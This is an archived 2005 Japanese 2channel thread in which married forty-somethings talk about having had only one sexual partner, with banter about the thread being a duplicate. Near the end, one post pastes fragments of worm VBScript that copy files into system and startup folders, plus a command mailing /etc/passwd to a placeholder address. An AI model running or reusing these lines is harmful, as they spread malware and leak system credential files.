2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

一本もしくは一穴しか知らない既婚者さん[2穴目]

1 :代理人:2005/05/30(月) 17:05:46
来月いよいよ40代に突入の主婦です。
これまで男のモノはダンナのモノ一本しか知らずにきました。
友人に話すと「うそ〜」「勿体無い〜」の世界です・・・

既婚者さんで一本しか知らない、あるいは奥さんの一穴しか知らない、
っていう人はどれくらいいるんでしょうか?
やっぱり私は少数派なのかな・・・

いよいよ2穴2本目に突入


2 :代理人:2005/05/30(月) 17:08:15
前スレ
一本もしくは一穴しか知らない既婚者さん
http://bubble3.2ch.net/test/read.cgi/cafe40/1115515669/l50

3 :名無しさん@お腹いっぱい。:2005/05/30(月) 17:50:49
まだ続けるのか?


4 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:00:13
あはははははははw
やっぱり建つとオモタょ。
こっちが落ち着くわww
ぶっちゃけいっそがしくてね、あっと気づいたらこの年なのさ。

5 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:08:43
怪しい関係もヨシ、一生の友人としてもヨシ。
でもなぁ、この年だ、ホレタハレタもいいけどね、肩肘はらず見栄もなく。
等身大の自分を出せる年頃なのでねぇの。
人生まだまだこれからさ。


6 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:13:52
>>1
>いよいよ2穴2本目に突入
スレタイと相反しているがなw


7 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:17:18
えんでねえのwww


8 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:31:17
新スレかよ。
前スレが立った時は典型的な単発の糞スレ、
ろくすっぽレスもつかずに即死と思ったw
わからんもんだなww


9 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:34:57
まぁそういうなww



10 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:36:27
騒いでいりぁ1と管理人が又のこのこ覗きにくるさww



11 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:50:18
自営でね、一本立ちしたのがハタチそこそこの頃。
結婚してすぐ看板掲げたのさ。
もうそれから大変で、子供を育てなきゃならんの会社はへっぽこだのとww
あっと気づいたらこの年よ、大観覧車に乗ってソーダ水を彼女と飲みたかった
けどね・・・こんな40男がする事じゃありまへんなぁw
この歳なら異性とする事は・・茶飲みババアと渋い茶をずるずる飲みながら
厚切りの羊羹を食べるのですかねww


12 :名無しさん@お腹いっぱい。:2005/05/30(月) 18:52:26
もし彼女、彼氏が出来たらどんな事したい?
ちょっとみんなに聞きたいょね。


13 :名無しさん@お腹いっぱい。:2005/05/30(月) 19:05:27
しかし異性になにを求めているのだろうの。
1.甘美なセックスw←そりぁないか(笑
この歳にもなれば経済も安定してるでしょに、金じゃないわな。
2.大事に思って欲しい・・・←これかな?
3.心理的に支えて欲しい←これかも・・・
4.私の犬になって←もう最悪だねw

14 :名無しさん@お腹いっぱい。:2005/05/30(月) 19:07:38
今日はおもいもかけず仕事が進んだから。
焼き鳥屋でも逝くか・・皆さんおっさっきーw

15 :名無しさん@お腹いっぱい。:2005/05/30(月) 19:16:24
一気に15レスか・・・・・・

16 :名無しさん@お腹いっぱい。:2005/05/30(月) 19:21:26
>>10
そそ、これは前スレ管理人を召還するための「天の岩戸の祭り」スレなのだわ。w


17 :名無しさん@お腹いっぱい。:2005/05/31(火) 06:59:25
あーぁ沈んでるから、重複スレ立っちゃったよ

18 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:02:29
このスレいつ立ったの?(笑)
ごめんなさいね、知らずに2本目を立ててしまいました。
2本目と2穴目で、男女使い分けてもいいかもね。

19 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:04:04
知らずにて…これだから(ry

20 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:05:33
慌てないでねw

21 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:06:52
二穴目と二本目だもんね、男女使い分けってのも面白いかもw


22 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:07:21
別に慌てていませんからご心配なく。(笑)

23 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:09:16
いんゃ文調が全てを物語るww

24 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:10:30
>>21
ええ、私もそう思いました。ありがとう。

25 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:18:00
二穴目っていうのは男ではシーラカンスを探すように貴重だと
思うょ。
まぁこのスレは必然的にdat落ちだなw


26 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:30:30
>>23

(笑)人が人の文章を読んで感じるものは、
半分はその人の気持ちを反映していると云います。
私の文章を読んで慌てていると感じたのも、
この状況は、あなたのとって慌てても不思議では無い場面だと
感じられるものだったのかも知れませんね。

私はちょっとしたご挨拶と、お詫びの積もりだったんです。
では失礼しますね。

27 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:34:19
26
ぇぇもう慌てましたw
心臓バクバク、喉がからから。
まぁいいゃ、頑張ってねw


28 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:43:01
だーね。何がなんでも向こうを使いたいらしいから好きにすればよろしいかと。
しかし、ルールを勝手に解釈するあたりがいかにも・・・

29 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:47:15
>>28
他にも重複しているスレッドは多々あるけど
それほど問題になっていないんじゃない?
向こうのスレ主はちゃんと謝ってるのに、
なんかモノスゴクこだわる人だね。



30 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:48:28
わたし、女だから二穴目っていうのはチョットw

31 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:50:03
なんでこう重箱の隅をつつくのが好きなのさーー
どっちでもよろしいがね。


32 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:51:19
重複スレで盛り上がろうっていうの?w


33 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:54:35
いや、赤信号みんなで渡れば怖くない話しで盛り上がるズラ
つか、喧嘩してもつまんないから下げるか

34 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:58:56
だよね。


35 :名無しさん@お腹いっぱい。:2005/05/31(火) 08:56:38
あら、こっちが下げ?ハーレクインロマンスさん達のごね勝ちなのね

36 :名無しさん@お腹いっぱい。:2005/05/31(火) 11:02:33
ハーレクインロマンス>言えてる。
後は、マジソン郡の橋とかヨン様、宝塚なんかも近いかなぁ。

37 :名無しさん@お腹いっぱい。:2005/06/02(木) 13:52:31
とうりすがりのものですけど・・・・・・

2本目とどう違うの???

38 :名無しさん@お腹いっぱい。:2005/06/02(木) 14:33:03
どっちもどっちだね。
ハーレクインロマンスだ。
まったくなぁ、ビラビラの好みまで言い合ってて、純愛もないもんだけどなぁ。


39 :名無しさん@お腹いっぱい。:2005/06/02(木) 14:36:12
この題のスレ、なんで二つもあるの?

40 :名無しさん@お腹いっぱい。:2005/06/02(木) 14:44:13
一穴目が先にたてられて、それが沈んでたので知られてなくて
どうも2本目がたてられたみたい。

雰囲気全然違うよね。

41 :名無しさん@お腹いっぱい。:2005/06/02(木) 14:52:12
↑意味わかんないけど、、、、、

間違って二つたったけど「本」と「穴」で男女で使い分けてもいいって事だろ。
実際内容違うもんな。

42 :名無しさん@お腹いっぱい。:2005/06/05(日) 01:37:25
このスレ、タンタンさんが建てたんでしょw


43 :名無しさん@お腹いっぱい。:2005/06/05(日) 05:10:45
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)